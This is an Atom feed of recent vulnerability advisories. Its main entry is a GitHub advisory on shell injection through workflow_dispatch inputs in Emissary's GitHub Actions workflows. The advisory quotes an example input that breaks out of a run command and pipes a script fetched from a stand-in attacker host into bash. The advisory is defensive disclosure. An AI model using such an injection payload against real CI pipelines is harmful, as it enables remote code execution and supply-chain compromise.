<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T11:29:42.200434+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-281131</id>
    <title>EUVD-2026-281131</title>
    <updated>2026-10-08T11:29:42.203852+00:00</updated>
    <content>EUVD-2026-281131</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-281131"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-35580</id>
    <title>fkie_cve-2026-35580</title>
    <updated>2026-10-08T11:29:42.203885+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-35580"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-3g6g-gq4r-xjm9</id>
    <title>GHSA-3g6g-gq4r-xjm9 — Emissary has GitHub Actions Shell Injection via Workflow Inputs</title>
    <updated>2026-10-08T11:29:42.203916+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Maven: gov.nsa.emissary:emissary</p>
<p>## Summary</p>
<p>Three GitHub Actions workflow files contained **10 shell injection points** where
user-controlled `workflow_dispatch` inputs were interpolated directly into shell
commands via `${{ }}` expression syntax. An attacker with repository write access
could inject arbitrary shell commands, leading to repository poisoning and supply
chain compromise affecting all downstream users.</p>
<p>## Affected Files</p>
<p>| Workflow file                            | Injection points |
|------------------------------------------|------------------|
| `.github/workflows/maven-version.yml`    | 4                |
| `.github/workflows/cherrypick.yml`       | 5                |
| `.github/workflows/maven-release.yml`    | 1                |</p>
<p>## Details</p>
<p>GitHub Actions `${{ }}` expressions inside `run:` blocks are substituted **before**
the shell interprets the command. When a `workflow_dispatch` input is placed directly
in a `run:` block, an attacker who can trigger the workflow can break out of the
intended command and execute arbitrary code.</p>
<p>### Example — `maven-version.yml` (before fix)</p>
<p>```yaml
- name: Set the name of the branch
  run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" &gt;&gt; "$GITHUB_ENV"
```</p>
<p>A malicious input such as `1.0.0"; curl attacker.com/backdoor.sh | bash; echo "`
would be interpolated directly into the shell, executing arbitrary commands with
the job's `GITHUB_TOKEN` permissions (`contents: write`, `pull-requests: write`).</p>
<p>### Impact</p>
<p>- Arbitrary code exe…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-3g6g-gq4r-xjm9"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2026:10540-1</id>
    <title>openSUSE-SU-2026:10540-1 — Botan-3.11.1-1.1 on GA media</title>
    <updated>2026-10-08T11:29:42.203973+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Botan-3.11.1-1.1 on GA media</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2026:10540-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-35580</id>
    <title>UBUNTU-CVE-2026-35580</title>
    <updated>2026-10-08T11:29:42.203991+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:25.10: botan3</p>
<p>[Unknown description]</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-35580"/>
  </entry>
</feed>
